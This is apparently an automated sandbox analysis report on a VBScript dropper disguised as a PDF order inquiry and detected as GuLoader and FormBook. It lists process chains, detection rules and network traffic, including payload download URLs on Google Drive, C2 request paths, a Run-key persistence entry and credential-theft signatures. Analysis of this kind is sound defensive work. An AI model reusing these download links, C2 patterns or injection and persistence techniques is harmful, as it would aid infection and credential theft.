Windows Analysis Report
Order Inquiry RFQ #278823_pdf.vbs

Overview

General Information

Sample name: Order Inquiry RFQ #278823_pdf.vbs
Analysis ID: 1511860
MD5: c1e9b6e5c75b875ff959e374ce28fd7f
SHA1: 36e5e0c10f38eaadee2ae715f861a51830f4cb3e
SHA256: a19a973707d1d16cc53b04c265f87c650fd58e6beeabd9244a95701ed8a0df2d
Tags: vbs
Infos:

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Obfuscated command line found
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7404 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Inquiry RFQ #278823_pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7512 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell script] MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7656 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ildprve.Fok && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 7928 cmdline: "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" [obfuscated PowerShell script] MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 7944 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell script] MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • cmd.exe (PID: 8100 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ildprve.Fok && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • wabmig.exe (PID: 7172 cmdline: "C:\Program Files (x86)\windows mail\wabmig.exe" MD5: BBC90B164F1D84DEDC1DC30F290EC5F6)
            • osqpHpjBCXXA.exe (PID: 824 cmdline: "C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
              • ktmutil.exe (PID: 648 cmdline: "C:\Windows\SysWOW64\ktmutil.exe" MD5: AC387D5962B2FE2BF4D518DD57BA7230)
                • osqpHpjBCXXA.exe (PID: 5596 cmdline: "C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
                • firefox.exe (PID: 2828 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • wabmig.exe (PID: 7188 cmdline: "C:\Program Files (x86)\windows mail\wabmig.exe" MD5: BBC90B164F1D84DEDC1DC30F290EC5F6)
  • wabmig.exe (PID: 1072 cmdline: "C:\Program Files (x86)\windows mail\wabmig.exe" MD5: BBC90B164F1D84DEDC1DC30F290EC5F6)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000C.00000002.2981736437.0000000000940000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000C.00000002.2981736437.0000000000940000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown | 0x2bdf0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55; 0x13e5f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown | 0x2bdf0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55; 0x13e5f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000E.00000002.2981468701.0000000001200000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
amsi64_7512.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

          System Summary

          Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Inquiry RFQ #278823_pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Inquiry RFQ #278823_pdf.vbs", CommandLine|base64offset|contains: "z, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Inquiry RFQ #278823_pdf.vbs", ProcessId: 7404, ProcessName: wscript.exe
          Source: Process started, Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe" , CommandLine: "C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe, NewProcessName: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe, OriginalFileName: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wabmig.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wabmig.exe, ParentProcessId: 7172, ParentProcessName: wabmig.exe, ProcessCommandLine: "C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe" , ProcessId: 824, ProcessName: osqpHpjBCXXA.exe
          Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Program Files (x86)\windows mail\wabmig.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\ktmutil.exe, ProcessId: 648, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KB60QNXX7JN
          Source: Process started, Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Inquiry RFQ #278823_pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Inquiry RFQ #278823_pdf.vbs", CommandLine|base64offset|contains: "z, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Inquiry RFQ #278823_pdf.vbs", ProcessId: 7404, ProcessName: wscript.exe
          Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell script]
          Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
          2024-09-16T14:45:47.825717+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49739 | 142.250.185.110 | 443 | TCP

          AV Detection

          Source: www.hsck520.com, Virustotal: Detection: 5%
          Source: www.amkmos.online, Virustotal: Detection: 10%
          Source: Yara match, File source: 0000000C.00000002.2981736437.0000000000940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000E.00000002.2981468701.0000000001200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000C.00000002.2981799081.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000A.00000002.2447450866.0000000022690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000A.00000002.2446978661.00000000216E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
          Source: unknown, HTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.4:49730 version: TLS 1.2
          Source: unknown, HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:49732 version: TLS 1.2
          Source: unknown, HTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.4:49739 version: TLS 1.2
          Source: unknown, HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:49740 version: TLS 1.2
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbu] source: powershell.exe, 00000006.00000002.2221760380.00000000075A5000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wabmig.pdbGCTL source: ktmutil.exe, 0000000C.00000002.2980525001.0000000000813000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: embly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbL/d source: powershell.exe, 00000001.00000002.2402315774.000001F2B7850000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wabmig.pdb source: ktmutil.exe, 0000000C.00000002.2980525001.0000000000813000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: osqpHpjBCXXA.exe, 0000000B.00000002.2979840816.00000000009CE000.00000002.00000001.01000000.00000008.sdmp
          Source: Binary string: bpdbtem.pdb source: powershell.exe, 00000001.00000002.2399198190.000001F2B75CB000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: wabmig.exe, 0000000A.00000003.2332183560.00000000215EF000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2334544648.000000002179A000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 0000000C.00000003.2431520308.0000000002C26000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32h.B source: powershell.exe, 00000001.00000002.2402315774.000001F2B789F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: wabmig.exe, wabmig.exe, 0000000A.00000003.2332183560.00000000215EF000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2334544648.000000002179A000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, ktmutil.exe, 0000000C.00000003.2431520308.0000000002C26000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: ktmutil.pdbGCTL source: wabmig.exe, 0000000A.00000002.2434687494.0000000005E5F000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000002.2434687494.0000000005E71000.00000004.00000020.00020000.00000000.sdmp, osqpHpjBCXXA.exe, 0000000B.00000002.2980927526.0000000001288000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ktmutil.pdb source: wabmig.exe, 0000000A.00000002.2434687494.0000000005E5F000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000002.2434687494.0000000005E71000.00000004.00000020.00020000.00000000.sdmp, osqpHpjBCXXA.exe, 0000000B.00000002.2980927526.0000000001288000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: *on.pdb source: powershell.exe, 00000001.00000002.2400865654.000001F2B7654000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_003AC270 FindFirstFileW,FindNextFileW,FindClose,12_2_003AC270

          Software Vulnerabilities

          Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 4x nop then xor eax, eax12_2_00399B00
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 4x nop then mov ebx, 00000004h12_2_02C204E0
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1-M5LzLlVhgm921Zwlu8IQ3wKOuC8U8qn HTTP/1.1Host: drive.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /download?id=1-M5LzLlVhgm921Zwlu8IQ3wKOuC8U8qn&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49739 -> 142.250.185.110:443
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1-M5LzLlVhgm921Zwlu8IQ3wKOuC8U8qn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1PuWtbu-uhB53y-WA99iWotEHLsyMU2wV HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /download?id=1PuWtbu-uhB53y-WA99iWotEHLsyMU2wV&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /43cj/?yD74=KV788dEH1&7JP=T5xbhsi5FuhzvTEQw2+KT2FsHNx9t47tozcKf+wmva0DEtOyEm69qyqfdc34c7IFdYZ32FzEk2z+82aLMtRHRH5540be2ISaKbwCt+kNSrDfOHoX6kdHk1g= HTTP/1.1Host: www.freel2charger.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; S6 Build/G920TU) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36
          Source: global trafficHTTP traffic detected: GET /alsy/?7JP=sFIZ3H46VDCFAxrc+oKxfEwJKwyB2GbujsubN54cMZ3ZKYO7DzbSb11HbeOZoAajDYdufGPs+3X3MuSwdoj2w4DFbeRQQ/e5pVDNloXMU4Bz0KAn7Ijiyww=&yD74=KV788dEH1 HTTP/1.1Host: www.lotlizard.hostAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; S6 Build/G920TU) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36
          Source: global trafficDNS traffic detected: DNS query: drive.google.com
          Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
          Source: global trafficDNS traffic detected: DNS query: www.freel2charger.com
          Source: global trafficDNS traffic detected: DNS query: www.lotlizard.host
          Source: global trafficDNS traffic detected: DNS query: www.amkmos.online
          Source: global trafficDNS traffic detected: DNS query: www.hsck520.com
          Source: unknownHTTP traffic detected: POST /alsy/ HTTP/1.1Host: www.lotlizard.hostAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-US,enConnection: closeCache-Control: no-cacheContent-Length: 200Content-Type: application/x-www-form-urlencodedOrigin: http://www.lotlizard.hostReferer: http://www.lotlizard.host/alsy/User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; S6 Build/G920TU) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 16 Sep 2024 12:46:42 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: close
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 16 Sep 2024 12:46:44 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: close
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 16 Sep 2024 12:46:47 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: close
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 16 Sep 2024 12:46:49 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: close
          Source: powershell.exe, 00000001.00000002.2302097105.000001F2A0F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
          Source: powershell.exe, 00000001.00000002.2302097105.000001F2A0DC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A11E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0DBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
          Source: powershell.exe, 00000001.00000002.2387730069.000001F2AF194000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000001.00000002.2302097105.000001F29F346000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000001.00000002.2302097105.000001F29F121000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2216604183.00000000048F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000001.00000002.2302097105.000001F29F346000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000006.00000002.2221760380.00000000075A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
          Source: powershell.exe, 00000001.00000002.2302097105.000001F29F121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
          Source: powershell.exe, 00000006.00000002.2216604183.00000000048F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
          Source: powershell.exe, 00000001.00000002.2302097105.000001F29F59E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F29F5BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0DA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0D84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F29F5B6000.00000004.00000800.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2178455364.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2178528179.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2178455364.0000000005E6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
          Source: powershell.exe, 00000001.00000002.2387730069.000001F2AF194000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000001.00000002.2387730069.000001F2AF194000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000001.00000002.2387730069.000001F2AF194000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 00000001.00000002.2302097105.000001F2A089A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0F0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googP
          Source: powershell.exe, 00000001.00000002.2302097105.000001F29F5CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F29F346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A089A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0F0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
          Source: wabmig.exe, 0000000A.00000002.2434620654.0000000005E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
          Source: wabmig.exe, 0000000A.00000002.2434620654.0000000005E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/C
          Source: powershell.exe, 00000001.00000002.2302097105.000001F29F346000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1-M5LzLlVhgm921Zwlu8IQ3wKOuC8U8qnP
          Source: powershell.exe, 00000006.00000002.2216604183.0000000004A46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1-M5LzLlVhgm921Zwlu8IQ3wKOuC8U8qnXR
          Source: wabmig.exe, 0000000A.00000003.2332992971.0000000005E59000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000002.2434687494.0000000005E59000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000002.2434603463.0000000005DF0000.00000004.00001000.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2332669615.0000000005E57000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000002.2434620654.0000000005E43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1PuWtbu-uhB53y-WA99iWotEHLsyMU2wV
          Source: wabmig.exe, 0000000A.00000002.2434620654.0000000005E43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1PuWtbu-uhB53y-WA99iWotEHLsyMU2wV1
          Source: powershell.exe, 00000001.00000002.2302097105.000001F2A0DA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googh:
          Source: powershell.exe, 00000001.00000002.2302097105.000001F29F5BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A11E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0DA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
          Source: wabmig.exe, 0000000A.00000002.2434687494.0000000005E71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
          Source: wabmig.exe, 0000000A.00000002.2434620654.0000000005E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/$
          Source: wabmig.exe, 0000000A.00000002.2434620654.0000000005E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/P
          Source: powershell.exe, 00000001.00000002.2302097105.000001F29F59E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F29F5BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F29F6B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A11E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0DA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0D84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F29F5B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1-M5LzLlVhgm921Zwlu8IQ3wKOuC8U8qn&export=download
          Source: wabmig.exe, 0000000A.00000002.2434687494.0000000005E71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1PuWtbu-uhB53y-WA99iWotEHLsyMU2wV&export=download
          Source: powershell.exe, 00000001.00000002.2302097105.000001F29F346000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000001.00000002.2302097105.000001F29FCEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
          Source: ktmutil.exe, 0000000C.00000003.2612364747.0000000007652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
